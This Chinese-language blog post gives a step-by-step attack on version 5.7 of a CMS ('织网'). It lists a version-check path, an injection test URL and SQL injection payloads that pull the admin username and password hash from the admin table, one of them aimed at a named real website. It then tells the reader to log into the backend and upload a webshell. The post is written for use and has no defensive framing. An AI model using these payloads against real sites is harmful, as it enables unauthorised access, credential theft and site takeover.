MPG‘Blog

织网5.7的漏洞 可任意文件上传

思路:访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传马子     


过程:


织网5.7的漏洞 可任意文件上传 网络知识 第1张


查看网站的版本

code 区域

cms /data/admin/ver.txt


织网5.7的漏洞 可任意文件上传 网络知识 第2张

查看是否有"朋友 修改",有则存在注入

code 区域

/member/ajax_membergroup.php?action=post&membergroup=1



帐号

code 区域

http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `#@__admin` where 1 or id=@`'`



去掉前三位和最后一位,得到管理员密码

code 区域

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `#@__admin`


织网5.7的漏洞 可任意文件上传 网络知识 第3张


然后~~~~你们都懂


织网5.7的漏洞 可任意文件上传 网络知识 第4张

[文章来源:大老李 黑白之道]

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

网站分类
«   2018年4月   »
1
2345678
9101112131415
16171819202122
23242526272829
30
友情链接
  • RainbowSoft Studio Z-Blog
  • 订阅本站的 RSS 2.0 新闻聚合
您好,欢迎到访网站!
  查看权限

Powered By Z-BlogPHP 本站法律顾问:吴承康律师

Copyright Mapeigang Rights Reserved.渝ICP备17004072号